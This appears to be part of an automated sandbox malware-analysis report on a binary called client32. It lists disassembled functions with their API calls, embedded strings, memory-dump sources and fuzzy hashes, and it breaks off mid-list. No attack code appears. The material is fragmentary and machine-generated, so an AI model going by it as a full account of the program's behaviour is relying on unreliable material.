                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: L
                                                                              • API String ID: 1338273076-2909332022
                                                                              • Opcode ID: 2107e069ea5de6a9477aac503117124e37d15776c0a1c58ca5e137a7724d062f
                                                                              • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                              • Opcode Fuzzy Hash: 2107e069ea5de6a9477aac503117124e37d15776c0a1c58ca5e137a7724d062f
                                                                              • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                              Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110AD1E3
                                                                                • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                              • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                              Strings
                                                                              • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad_memset
                                                                              • String ID: winscard.dll is NOT valid!!!
                                                                              • API String ID: 212038770-1939809930
                                                                              • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                              • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                              • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                              Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                              • String ID: string too long
                                                                              • API String ID: 963545896-2556327735
                                                                              • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                              • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                              • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                              Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                              • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText
                                                                              • String ID: ...
                                                                              • API String ID: 3367045223-440645147
                                                                              • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                              • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                              • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                              Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
                                                                                • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                              • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                              Strings
                                                                              • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                              • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                              • API String ID: 2940908497-693965840
                                                                              • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                              • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                              • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                              • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                              Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandFileModuleNameStrings
                                                                              • String ID: :
                                                                              • API String ID: 2034136378-336475711
                                                                              • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                              • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                              • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                              • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                              Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                              • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassNameProcessThreadWindow
                                                                              • String ID: tooltips_class32
                                                                              • API String ID: 2910564809-1918224756
                                                                              • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                              • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                              • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                              • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                              Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                              • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                              • _memset.LIBCMT ref: 11039216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$Window$ObjectRectShow_memset
                                                                              • String ID: 134349
                                                                              • API String ID: 3037201586-623835197
                                                                              • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                              • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                              Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(00020019,?,00000000,EE49F673,00000000,00020019,?,00000000), ref: 110ED600
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValuewvsprintf
                                                                              • String ID: ($Error %d getting %s
                                                                              • API String ID: 141982866-3697087921
                                                                              • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                              • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                              • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                              • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                              Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                              • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                              • API String ID: 2102423945-1777407139
                                                                              • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                              • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                              Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Error. NULL capbuf, xrefs: 1100B6A1
                                                                              • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
